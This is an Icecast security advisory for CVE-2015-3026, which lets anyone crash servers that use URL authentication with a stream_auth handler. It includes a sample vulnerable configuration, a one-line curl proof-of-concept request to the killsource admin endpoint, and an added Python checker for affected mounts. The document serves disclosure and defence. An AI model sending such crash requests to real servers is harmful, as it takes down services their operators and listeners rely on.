Icecast can be crashed remotely if stream_auth is enabled.
Downstream bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
Icecast can be killed by anyone with a simple HTTP request when <authentication type="url"> is used and a stream_auth handler is defined.
Example configuration:
<mount>
    <mount-name>/test.ogg</mount-name>
    <authentication type="url">
        <option name="stream_auth" value="http://localhost/auth"/>
    </authentication>
</mount>
Proof of concept exploit:
curl "http://stream.example.org:8000/admin/killsource?mount=/test.ogg"
This happens if no logon credentials are sent with the request. The crash happens regardless of a source client being connected to the vulnerable mountpoint.
The fix will be released today in security release 2.4.2.
CVE-2015-3026
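To check whether a deployment matches the affected configuration described above, the following added example (not part of the original report or of Icecast) scans an icecast.xml document for mounts that use URL authentication with a stream_auth handler. The sample configuration is constructed, the function name is hypothetical, and treating an empty value as "no handler defined" is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample config; only the /test.ogg mount is taken from the report.
SAMPLE_CONFIG = """<icecast>
  <mount>
    <mount-name>/test.ogg</mount-name>
    <authentication type="url">
      <option name="stream_auth" value="http://localhost/auth"/>
    </authentication>
  </mount>
  <mount>
    <mount-name>/listeners-only.ogg</mount-name>
    <authentication type="url">
      <option name="listener_add" value="http://localhost/listener"/>
    </authentication>
  </mount>
  <mount>
    <mount-name>/htpasswd.ogg</mount-name>
    <authentication type="htpasswd">
      <option name="filename" value="users.txt"/>
    </authentication>
  </mount>
</icecast>"""


def mounts_with_stream_auth(config_xml):
    """Return mount names that use URL auth with a stream_auth handler."""
    root = ET.fromstring(config_xml)
    affected = []
    for mount in root.iter("mount"):
        name = (mount.findtext("mount-name") or "<unnamed>").strip()
        for auth in mount.findall("authentication"):
            if (auth.get("type") or "").strip().lower() != "url":
                continue
            handlers = [o.get("value", "") for o in auth.findall("option")
                        if o.get("name") == "stream_auth"]
            # Assumption: an empty value means no handler is actually defined.
            if any(v.strip() for v in handlers):
                affected.append(name)
                break
    return affected


if __name__ == "__main__":
    for name in mounts_with_stream_auth(SAMPLE_CONFIG):
        print(f"{name}: URL auth with stream_auth; needs Icecast 2.4.2 or later")
```

Any mount it reports meets the condition in this report and should run on the fixed 2.4.2 release.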